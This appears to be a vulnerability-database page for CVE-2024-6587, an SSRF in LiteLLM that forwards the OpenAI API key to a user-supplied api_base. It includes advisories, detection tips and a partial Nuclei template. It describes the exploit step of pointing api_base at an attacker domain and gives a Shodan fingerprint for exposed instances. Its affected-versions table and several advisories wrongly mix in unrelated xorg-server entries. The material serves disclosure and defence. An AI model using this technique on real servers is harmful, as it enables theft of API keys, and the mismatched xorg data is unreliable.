CVE-2024-6587
published 2024-09-13CVE-2024-6587: A Server-Side Request Forgery (SSRF) vulnerability exists in berriai/litellm version 1.38.10. This vulnerability allows users to specify the `api_base`…
PriorityP182high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
36.95%
98.3th percentile
A Server-Side Request Forgery (SSRF) vulnerability exists in berriai/litellm version 1.38.10. This vulnerability allows users to specify the `api_base` parameter when making requests to `POST /chat/completions`, causing the application to send the request to the domain specified by `api_base`. This request includes the OpenAI API key. A malicious user can set the `api_base` to their own domain and intercept the OpenAI API key, leading to unauthorized access and potential misuse of the API key.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| berriai | berriai_litellm | >= unspecified < 1.44.9 | 1.44.9 |
| litellm | litellm | — | — |
| litellm | litellm | >= 0 < 1.44.8 | 1.44.8 |
| x.org | xorg-server | >= 0 < 2:1.20.13-1ubuntu1~20.04.15 | 2:1.20.13-1ubuntu1~20.04.15 |
| x.org | xorg-server | >= 0 < 2:21.1.4-2ubuntu1.7~22.04.8 | 2:21.1.4-2ubuntu1.7~22.04.8 |
| x.org | xorg-server | >= 0 < 2:1.18.4-0ubuntu0.12+esm9 | 2:1.18.4-0ubuntu0.12+esm9 |
| x.org | xorg-server | >= 0 < 2:1.18.4-0ubuntu0.12+esm10 | 2:1.18.4-0ubuntu0.12+esm10 |
| x.org | xorg-server | >= 0 < 2:1.19.6-1ubuntu4.15+esm4 | 2:1.19.6-1ubuntu4.15+esm4 |
| x.org | xorg-server | >= 0 < 2:1.19.6-1ubuntu4.15+esm5 | 2:1.19.6-1ubuntu4.15+esm5 |
| x.org | xwayland | >= 0 < 2:22.1.1-1ubuntu0.11 | 2:22.1.1-1ubuntu0.11 |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit payload: POST /chat/completions with a user-controlled `api_base` field in the JSON body pointing to an attacker-controlled domain. The server will forward the OpenAI API key in the Authorization: Bearer header to that domain.
- →Confirm exploitation by detecting an outbound HTTP request to an attacker-controlled host containing the string 'Bearer' in the request body/headers — indicating the OpenAI API key was exfiltrated.
- →Identify exposed LiteLLM instances via Shodan using the favicon hash 439373620.
- →Monitor POST requests to /chat/completions where the JSON body contains an `api_base` key with an external or unexpected domain value — this is the SSRF trigger parameter.
- →Alert on outbound HTTP requests from the LiteLLM server process to domains not in an approved allowlist, especially those carrying an Authorization: Bearer header, as this indicates SSRF-based API key leakage.
- ·The vulnerability affects LiteLLM version 1.38.10 specifically. Verify the deployed version before applying detection rules to avoid false positives on patched instances. ↗
- ·The Nuclei template uses an out-of-band interaction server (interactsh) to confirm exploitation. In environments without external egress, the SSRF may still occur internally but will not trigger the interactsh-based matcher — use internal network monitoring as a supplement.
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
osv9.8CRITICAL
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
LiteLLM Server-Side Request Forgery (SSRF) vulnerability
osv·2024-09-13
CVE-2024-6587 [HIGH] LiteLLM Server-Side Request Forgery (SSRF) vulnerability
LiteLLM Server-Side Request Forgery (SSRF) vulnerability
A Server-Side Request Forgery (SSRF) vulnerability exists in berriai/litellm version 1.38.10. This vulnerability allows users to specify the `api_base` parameter when making requests to `POST /chat/completions`, causing the application to send the request to the domain specified by `api_base`. This request includes the OpenAI API key. A malicious user can set the `api_base` to their own domain and intercept the OpenAI API key, leading to unauthorized access and potential misuse of the API key.
GHSA
LiteLLM Server-Side Request Forgery (SSRF) vulnerability
ghsa·2024-09-13
CVE-2024-6587 [HIGH] CWE-918 LiteLLM Server-Side Request Forgery (SSRF) vulnerability
LiteLLM Server-Side Request Forgery (SSRF) vulnerability
A Server-Side Request Forgery (SSRF) vulnerability exists in berriai/litellm version 1.38.10. This vulnerability allows users to specify the `api_base` parameter when making requests to `POST /chat/completions`, causing the application to send the request to the domain specified by `api_base`. This request includes the OpenAI API key. A malicious user can set the `api_base` to their own domain and intercept the OpenAI API key, leading to unauthorized access and potential misuse of the API key.
OSV
xorg-server, xwayland regression
osv·2024-02-01·CVSS 9.8
CVE-2023-6816 xorg-server, xwayland regression
xorg-server, xwayland regression
USN-6587-1 fixed vulnerabilities in X.Org X Server. The fix was incomplete
resulting in a possible regression. This update fixes the problem.
Original advisory details:
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An
attacker could possibly use this issue to cause the X Server to crash,
obtain sensitive information, or execute arbitrary code. (CVE-2023-6816)
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
reattaching to a different master device. An attacker could use this issue
to cause the X Server to crash, leading to a denial of service, or possibly
execute arbitrary code. (CVE-2024-0229)
Olivier Fourdan and Donn Seeley discover
OSV
xorg-server, xwayland regression
osv·2024-01-30·CVSS 9.8
xorg-server, xwayland regression
xorg-server, xwayland regression
USN-6587-1 fixed vulnerabilities in X.Org X Server. The fix was incomplete
resulting in a possible regression. This update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An
attacker could possibly use this issue to cause the X Server to crash,
obtain sensitive information, or execute arbitrary code. (CVE-2023-6816)
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
reattaching to a different master device. An attacker could use this issue
to cause the X Server to crash, leading to a denial of service, or possibly
execute arbitrary code. (CVE-2024-0229)
Oli
OSV
xorg-server vulnerabilities
osv·2024-01-22·CVSS 9.8
CVE-2023-6816 xorg-server vulnerabilities
xorg-server vulnerabilities
USN-6587-1 fixed several vulnerabilities in X.Org. This update provides
the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.
Original advisory details:
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An
attacker could possibly use this issue to cause the X Server to crash,
obtain sensitive information, or execute arbitrary code. (CVE-2023-6816)
Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled
reattaching to a different master device. An attacker could use this issue
to cause the X Server to crash, leading to a denial of service, or possibly
execute arbitrary code. (CVE-2024-0229)
Olivier Fourdan and Donn Seeley discovered that
VulnCheck
LiteLLM Server-Side Request Forgery (SSRF) Vulnerability
vulncheck·2024·CVSS 7.5
CVE-2024-6587 [HIGH] LiteLLM Server-Side Request Forgery (SSRF) Vulnerability
LiteLLM Server-Side Request Forgery (SSRF) Vulnerability
LiteLLM is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability that exposes OpenAI API Keys.
Affected: LiteLLM LiteLLM
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-22&host_type=src&vulnerability=cve-2024-6587; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-25&host_type=src&vulnerability=cve-2024-6587; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-26&host_type=src&vulnerability=cve-2024-6587; https://dashboard.shadowserver
No detection rules found.
Nuclei
LiteLLM - Server-Side Request Forgery
nuclei·CVSS 7.5
CVE-2024-6587 [HIGH] LiteLLM - Server-Side Request Forgery
LiteLLM - Server-Side Request Forgery
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
Template:
id: CVE-2024-6587
info:
name: LiteLLM - Server-Side Request Forgery
author: pdresearch,iamnoooob,rootxharsh,lambdasawa
severity: high
description: |
LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.
impact: |
Attackers can exploit SSRF to send requests to arbitrary URLs with OpenAI API keys in the Authorization header, potentially exposing API credentials.
remediation: |
Update LiteLLM to the latest version that addresses the SSRF vulnerability in the chat/completions endpoint.
reference:
- https://huntr.com/bounties/4001e1a2-7b7a-4776-a3ae-e6692ec3d997
- https://cve.mitre.org/cgi-bin/cvename.cgi?na
Greynoiseio
New SSRF Exploitation Surge Serves as a Reminder of 2019 Capital One Breach
blogs_greynoiseio·2025-03-11
New SSRF Exploitation Surge Serves as a Reminder of 2019 Capital One Breach
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
NoiseLetter September 2024
blogs_greynoiseio
NoiseLetter September 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2024-09-13
Published
Exploited in the wild